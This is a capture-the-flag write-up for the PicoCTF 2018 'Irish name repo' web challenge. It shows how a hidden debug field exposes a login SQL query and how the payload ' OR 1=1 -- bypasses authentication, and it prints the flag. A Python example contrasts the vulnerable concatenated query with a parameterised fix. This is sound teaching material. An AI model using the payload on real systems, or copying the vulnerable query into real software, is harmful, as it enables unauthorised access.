
[PicoCTF 2018] - web - Irish name repo

This is one of my writeups for PicoCTF 2018

Problem

There is a website running at http://2018shell3.picoctf.com:11899. Do you think you can log us in? Try to see if you can login!

Hints :

  1. There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?

Solution

The hint here seems to point at an SQL injection, but let's browse around the app. We have access to three views :

  1. The index, that has nothing interesting
  2. A "support" page
  3. An "admin login page"

The support page contains another clue pointing at an SQL injection :

Hi. I tried adding my favorite Irish person, Conan O'Brien. But I keep getting something called a SQL Error

With that in mind, we can look at the login page. Inspecting the source, we see there's a hidden debug field :

<form action="login.php" method="POST">
    <fieldset>
        <div class="form-group">
            <label for="username">Username:</label>
            <input type="text" id="username" name="username" class="form-control">
        </div>
        <div class="form-group">
            <label for="password">Password:</label>
            <div class="controls">
                <input type="password" id="password" name="password" class="form-control">
            </div>
        </div>
        <input type="hidden" name="debug" value="0">

        <div class="form-actions">
            <input type="submit" value="Login" class="btn btn-primary">
        </div>
    </fieldset>
</form>

To confirm that, I sent a request with a random username and no password (Note: I used Burp Suite's proxy and repeater to manipulate the requests). With debug=0, we get :

<h1>Login failed.</h1>

and with debug=1 :

<pre>username: iodbh
password: 
SQL query: SELECT * FROM users WHERE name='aaa' AND password=''
</pre><h1>Login failed.</h1>

Great, now we know how the SQL query is constructed. We can make it return all rows by using the username ' OR 1=1 -- with an empty password, which ends up building the following query :

SELECT * FROM users WHERE name='' OR 1=1 --' AND password=''

Since anything after -- is ignored, the effective query is :

SELECT * FROM users WHERE name='' OR 1=1

If we try this payload, we get the flag in the response : picoCTF{con4n_r3411y_1snt_1r1sh_9cbc118f}
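To show both halves of the bug, here is an added example (not the challenge's own login.php, which is PHP; this is a Python/sqlite3 model with a constructed two-user table): the same string-concatenated query the debug output revealed, next to a parameterised version. The vulnerable function breaks on the support page's "Conan O'Brien" input and returns every row for the ' OR 1=1 -- payload; the parameterised one treats both inputs as plain data.

```python
import sqlite3

# Constructed sample users; the real challenge database is not known.
USERS = [("admin", "s3cret-admin-pw"), ("conan", "obrien")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def vulnerable_login(conn, username, password):
    # Mirrors the query in the debug output: user input is pasted straight
    # into the SQL text, so quotes and -- comment markers change its meaning.
    query = f"SELECT * FROM users WHERE name='{username}' AND password='{password}'"
    return conn.execute(query).fetchall()


def safe_login(conn, username, password):
    # Parameterised query: the driver binds the values separately from the
    # SQL text, so a quote or -- in the input stays literal data.
    query = "SELECT * FROM users WHERE name=? AND password=?"
    return conn.execute(query, (username, password)).fetchall()


def raises_sql_error(conn, username):
    # The support page's symptom: an apostrophe in the name breaks the query.
    try:
        vulnerable_login(conn, username, "")
        return False
    except sqlite3.OperationalError:
        return True


def demo():
    conn = make_db()
    payload = "' OR 1=1 --"
    return {
        "vulnerable_rows": len(vulnerable_login(conn, payload, "")),
        "safe_rows": len(safe_login(conn, payload, "")),
        "safe_legit_rows": len(safe_login(conn, "conan", "obrien")),
        "apostrophe_breaks_vulnerable": raises_sql_error(conn, "Conan O'Brien"),
        "apostrophe_safe_rows": len(safe_login(conn, "Conan O'Brien", "")),
    }


if __name__ == "__main__":
    print(demo())
```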